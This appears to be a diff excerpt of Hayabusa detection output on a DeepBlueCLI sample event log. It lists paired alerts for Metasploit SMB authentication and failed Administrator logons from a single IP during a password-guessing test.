+2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Az7cwIWXUGVIMTv5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Djaxf99PVs2VkMy6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rbTSoTdaQ0Y4c9Gw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: g9aTo4QBHfrgPYZ2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dpHKjYzZTn0ruIrf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HqhPnV6tc8airRqu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RIOCqtXh5ji12U5q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RwuGZ0kgg1yToLlr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZSBbd4qBRuzeKBjD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8zS1Muxc9gpcqv23  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c6wiIkfkgtso42P1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q1ilRmhSB5RfvpVa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PuQ47GGBraimypWL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UfUsAYWilbwMScpE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 22ZSltGNwIl0DNDM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IYwG9IUpdk5DmM8w  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4a8kbGxQFHDBodGF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KoLqIaO8p3k9kOkj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rUnonSx3ZBdkyGhu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: d1QJziwKhsaJljGV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZhcNRrpODYB9jZxs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Yi5JE53caVn7n54w  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Jx6qTASzFp830ud6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b4L8HtBWlmAMTjCf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F4hVfTwibHreepku  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3TlapK211UT8SO0W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Mzzw3uPkn2cgtmlF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aPnfUjwJei5E5BD7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Mm1k0eeKAYokIbDg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w8TDNcJ3LMyNtUe1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ogKKslkdXvc9f130  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sgoy6gMfe5N0UiP5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lfjf3d6I8TsBOzvc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Vs8DG8s81oOwYoI7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LFkgN1aDoYkQ4qrT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KMwLokYpcFIYHegd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6oKradBV4ERsQnKs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0qPzlzfmgrbYTKqQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qKYlBm2lhobHzbjh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DBMu96oqO9tb3f4O  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tO04Q3eYdzyuy51v  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FrIa2UrSrfdhkDCx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: axhhyMrGl95O16Vg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: atjvfi8QeEDluhL2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9HPBZKUiiKeyQwSr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
